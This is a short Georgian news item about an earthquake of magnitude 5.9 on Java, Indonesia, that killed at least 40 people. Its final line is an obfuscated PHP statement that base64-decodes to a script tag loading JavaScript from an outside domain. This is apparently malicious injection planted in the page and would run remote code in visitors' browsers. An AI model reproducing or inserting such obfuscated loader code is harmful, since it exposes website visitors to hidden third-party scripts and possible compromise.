celsiusi
ავერსი შნაიდერი
ინდონეზიაში მიწისძვრის შედეგად სულ მცირე 40 ადამიანი დაიღუპა. ასობით მოქალაქე დაშავდა. „ბიბისის“ ცნობით, სტიქია კუნძულ იავაზე მოხდა. მისი სიმძლავრე 5,9 მაგნიტუდას აღწევდა. აშშ-ის გეოლოგიური სამსახურის ინფორმაციით, ეპიცენტრი ათი კილომეტრის სიღრმეზე იყო.
 
ამჟამად სტიქიის ზონაში სამაშველო ოპერაცია გრძელდება. მაშველები ცდილობენ, ნანგრევებიდან გამოიყვანონ გადარჩენილი მოქალაქეები.
 
მიწისქვეშა ბიძგები იგრძნობოდა ინდონეზიის დედაქალაქ ჯაკარტაშიც, რომელიც ეპიცენტრიდან 100 კილომეტრში მდებარეობს.
 
ოფიციალური პირები აფრთხილებენ მოსახლეობას, რომ უახლოეს ხანში მოსალოდნელია განმეორებითი ბიძგები, ხოლო სტიქიის შედეგად დაღუპულთა რაოდენობა შეიძლება, გაიზარდოს.
288
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");